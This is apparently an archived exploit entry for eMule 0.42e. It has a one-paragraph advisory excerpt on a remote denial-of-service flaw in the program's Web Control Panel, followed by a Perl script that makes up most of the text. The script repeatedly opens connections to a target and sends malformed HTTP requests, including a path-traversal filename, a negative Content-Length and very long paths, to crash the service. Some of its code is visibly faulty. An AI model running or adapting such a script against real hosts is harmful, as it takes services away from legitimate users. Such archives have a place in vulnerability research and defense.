source: https://www.securityfocus.com/bid/10317/info It has been reported that eMule's Web Control Panel is susceptible to a remote denial of service vulnerability. This issue is reportedly triggered by sending malformed requests to the web interface. Upon processing malformed requests, the affected application will crash, denying service to legitimate users. #!/usr/bin/perl system("cls"); # Emule 0.42e Remote Denial Of Service Exploit # Coded by Rafel Ivgi, The-Insider: http://theinsider.deep-ice.com # usage: perl emule042e.pl use IO::Socket; my $host = $ARGV[0]; my $port = $ARGV[1]; my $times = $ARGV[2]; if ($host) { unless($port) { $port="4711";} unless($times) { $times="50";} { print "Emule 0.42e Remote Denial Of Service Exploit Coded by The-Insider\n\n"; print "[+] Connecting to target $host:$port\n"; for $i (1..$times) { $remote=IO::Socket::INET->new(Proto =>"tcp", PeerAddr => $host, PeerPort => 80, Type => SOCK_STREAM Timeout => 8); unless ($remote) { die "can't connect to $host" } print "[+] Connected to target $host:$port\n"; print "[+] Sending Request\n"; $remote ->autoflush(1); print $remote "GET / HTTP/1.1 Content-Disposition: form-data; name=\"file\"; filename=\"../../../file.txt\" "; print $remote "POST / HTTP/1.0 Content-Length: 10 123456789 "; print $remote "POST / HTTP/1.1 Content-Length: -1 "; print $remote "GET /%%%%%%%%%%%% HTTP/1.0 "; print $remote "index.htm "; print $remote "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 "; print $remote "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa "; print $remote "GET c:\ "; print $remote "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 "; while(<$remote>) { $cool .= $_; if ($cool =~ /Server:/i) { close $cool; -close $remote; } } print "[+] Target Demolished.\n"; }}} else { die "\nEmule 0.42e Remote Denial Of Service Exploit Coded by Rafel Ivgi, The-Insider: http://theinsider.deep-ice.com usage: perl emule042e.pl \n\n"; }